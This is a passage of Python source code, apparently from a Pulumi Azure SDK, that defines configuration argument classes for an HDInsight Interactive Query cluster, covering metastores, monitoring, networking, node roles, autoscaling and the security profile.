            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresOozieArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All Oozie metastore connection settings are required.
        for key, arg in (("database_name", database_name), ("password", password),
                         ("server", server), ("username", username)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMonitorArgs:
    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        # Both OMS settings are required for monitoring.
        for key, arg in (("log_analytics_workspace_id", log_analytics_workspace_id),
                         ("primary_key", primary_key)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace ID."""
        return pulumi.get(self, "log_analytics_workspace_id")

    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", value)

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace key."""
        return pulumi.get(self, "primary_key")

    @primary_key.setter
    def primary_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "primary_key", value)
@pulumi.input_type
class InteractiveQueryClusterNetworkArgs:
    def __init__(__self__, *,
                 connection_direction: Optional[pulumi.Input[str]] = None,
                 private_link_enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] connection_direction: The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
        """
        # Both network settings are optional; register only what was supplied.
        for key, arg in (("connection_direction", connection_direction),
                         ("private_link_enabled", private_link_enabled)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="connectionDirection")
    def connection_direction(self) -> Optional[pulumi.Input[str]]:
        """The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created."""
        return pulumi.get(self, "connection_direction")

    @connection_direction.setter
    def connection_direction(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_direction", value)

    @property
    @pulumi.getter(name="privateLinkEnabled")
    def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created."""
        return pulumi.get(self, "private_link_enabled")

    @private_link_enabled.setter
    def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class InteractiveQueryClusterRolesArgs:
    def __init__(__self__, *,
                 head_node: pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']):
        """
        :param pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        # All three role blocks are required for an Interactive Query cluster.
        for key, arg in (("head_node", head_node),
                         ("worker_node", worker_node),
                         ("zookeeper_node", zookeeper_node)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs']:
        """A `head_node` block as defined above."""
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, value: pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs']:
        """A `worker_node` block as defined below."""
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, value: pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']:
        """A `zookeeper_node` block as defined below."""
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, value: pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class InteractiveQueryClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        # Required arguments.
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments: register only the ones the caller supplied.
        for key, arg in (("password", password),
                         ("ssh_keys", ssh_keys),
                         ("subnet_id", subnet_id),
                         ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 autoscale: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']] = None,
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if autoscale is not None:
            pulumi.set(__self__, "autoscale", autoscale)
        if min_instance_count is not None:
            # `min_instance_count` is deprecated upstream; warn, but still
            # record the value so existing callers keep working.
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def autoscale(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']]:
        """
        A `autoscale` block as defined below.
        """
        return pulumi.get(self, "autoscale")

    @autoscale.setter
    def autoscale(self, value: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']]):
        pulumi.set(self, "autoscale", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs:
    def __init__(__self__, *,
                 capacity: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
                 recurrence: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
        """
        Autoscale settings for the Worker Nodes.

        :param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
        :param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
        """
        # Only record the arguments that were actually supplied.
        for attr, arg in (("capacity", capacity), ("recurrence", recurrence)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
        """
        A `capacity` block as defined below.
        """
        return pulumi.get(self, "capacity")

    @capacity.setter
    def capacity(self, val: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
        pulumi.set(self, "capacity", val)

    @property
    @pulumi.getter
    def recurrence(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
        """
        A `recurrence` block as defined below.
        """
        return pulumi.get(self, "recurrence")

    @recurrence.setter
    def recurrence(self, val: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
        pulumi.set(self, "recurrence", val)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs:
    def __init__(__self__, *,
                 max_instance_count: pulumi.Input[int],
                 min_instance_count: pulumi.Input[int]):
        """
        Capacity bounds for worker-node autoscaling.

        :param pulumi.Input[int] max_instance_count: Upper bound of worker nodes to autoscale to, based on the cluster's activity.
        :param pulumi.Input[int] min_instance_count: Lower bound of worker nodes to autoscale to, based on the cluster's activity.
        """
        pulumi.set(__self__, "max_instance_count", max_instance_count)
        pulumi.set(__self__, "min_instance_count", min_instance_count)

    @property
    @pulumi.getter(name="maxInstanceCount")
    def max_instance_count(self) -> pulumi.Input[int]:
        """
        Upper bound of worker nodes to autoscale to, based on the cluster's activity.
        """
        return pulumi.get(self, "max_instance_count")

    @max_instance_count.setter
    def max_instance_count(self, val: pulumi.Input[int]):
        pulumi.set(self, "max_instance_count", val)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> pulumi.Input[int]:
        """
        Lower bound of worker nodes to autoscale to, based on the cluster's activity.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, val: pulumi.Input[int]):
        pulumi.set(self, "min_instance_count", val)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
    def __init__(__self__, *,
                 schedules: pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
                 timezone: pulumi.Input[str]):
        """
        Recurring autoscale schedule for the Worker Nodes.

        :param pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
        :param pulumi.Input[str] timezone: Time zone used for the autoscale schedule times.
        """
        pulumi.set(__self__, "schedules", schedules)
        pulumi.set(__self__, "timezone", timezone)

    @property
    @pulumi.getter
    def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
        """
        A list of `schedule` blocks as defined below.
        """
        return pulumi.get(self, "schedules")

    @schedules.setter
    def schedules(self, val: pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
        pulumi.set(self, "schedules", val)

    @property
    @pulumi.getter
    def timezone(self) -> pulumi.Input[str]:
        """
        Time zone used for the autoscale schedule times.
        """
        return pulumi.get(self, "timezone")

    @timezone.setter
    def timezone(self, val: pulumi.Input[str]):
        pulumi.set(self, "timezone", val)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
    def __init__(__self__, *,
                 days: pulumi.Input[Sequence[pulumi.Input[str]]],
                 target_instance_count: pulumi.Input[int],
                 time: pulumi.Input[str]):
        """
        A single entry in the recurring autoscale schedule.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week on which to perform autoscale.
        :param pulumi.Input[int] target_instance_count: The worker-node count to autoscale to at the given time.
        :param pulumi.Input[str] time: The time of day, in 24-hour format, at which to perform the autoscale.
        """
        for attr, arg in (("days", days),
                          ("target_instance_count", target_instance_count),
                          ("time", time)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        The days of the week on which to perform autoscale.
        """
        return pulumi.get(self, "days")

    @days.setter
    def days(self, val: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "days", val)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The worker-node count to autoscale to at the given time.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, val: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", val)

    @property
    @pulumi.getter
    def time(self) -> pulumi.Input[str]:
        """
        The time of day, in 24-hour format, at which to perform the autoscale.
        """
        return pulumi.get(self, "time")

    @time.setter
    def time(self, val: pulumi.Input[str]):
        pulumi.set(self, "time", val)
@pulumi.input_type
class InteractiveQueryClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Configuration for the Zookeeper Nodes of the cluster.

        :param pulumi.Input[str] username: Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: Size of the Virtual Machine to use for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: Password for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH Keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: ID of the Subnet (within the Virtual Network) in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments are only recorded when supplied.
        for attr, arg in (("password", password),
                          ("ssh_keys", ssh_keys),
                          ("subnet_id", subnet_id),
                          ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, val: pulumi.Input[str]):
        pulumi.set(self, "username", val)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        Size of the Virtual Machine to use for the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, val: pulumi.Input[str]):
        pulumi.set(self, "vm_size", val)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, val: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", val)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        SSH Keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, val: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", val)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Subnet (within the Virtual Network) in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, val: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", val)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Virtual Network in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, val: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", val)
@pulumi.input_type
class InteractiveQueryClusterSecurityProfileArgs:
    def __init__(__self__, *,
                 aadds_resource_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 domain_user_password: pulumi.Input[str],
                 domain_username: pulumi.Input[str],
                 ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
                 msi_resource_id: pulumi.Input[str],
                 cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Enterprise Security Package settings for the cluster.

        :param pulumi.Input[str] aadds_resource_id: Resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_name: Name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_user_password: User password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_username: Username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: LDAPS URLs used to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        :param pulumi.Input[str] msi_resource_id: User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: Distinguished names of the cluster user groups. Changing this forces a new resource to be created.
        """
        for attr, arg in (("aadds_resource_id", aadds_resource_id),
                          ("domain_name", domain_name),
                          ("domain_user_password", domain_user_password),
                          ("domain_username", domain_username),
                          ("ldaps_urls", ldaps_urls),
                          ("msi_resource_id", msi_resource_id)):
            pulumi.set(__self__, attr, arg)
        if cluster_users_group_dns is not None:
            pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)

    @property
    @pulumi.getter(name="aaddsResourceId")
    def aadds_resource_id(self) -> pulumi.Input[str]:
        """
        Resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "aadds_resource_id")

    @aadds_resource_id.setter
    def aadds_resource_id(self, val: pulumi.Input[str]):
        pulumi.set(self, "aadds_resource_id", val)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        Name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, val: pulumi.Input[str]):
        pulumi.set(self, "domain_name", val)

    @property
    @pulumi.getter(name="domainUserPassword")
    def domain_user_password(self) -> pulumi.Input[str]:
        """
        User password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_user_password")

    @domain_user_password.setter
    def domain_user_password(self, val: pulumi.Input[str]):
        pulumi.set(self, "domain_user_password", val)

    @property
    @pulumi.getter(name="domainUsername")
    def domain_username(self) -> pulumi.Input[str]:
        """
        Username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "domain_username")

    @domain_username.setter
    def domain_username(self, val: pulumi.Input[str]):
        pulumi.set(self, "domain_username", val)

    @property
    @pulumi.getter(name="ldapsUrls")
    def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        LDAPS URLs used to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ldaps_urls")

    @ldaps_urls.setter
    def ldaps_urls(self, val: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "ldaps_urls", val)

    @property
    @pulumi.getter(name="msiResourceId")
    def msi_resource_id(self) -> pulumi.Input[str]:
        """
        User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "msi_resource_id")

    @msi_resource_id.setter
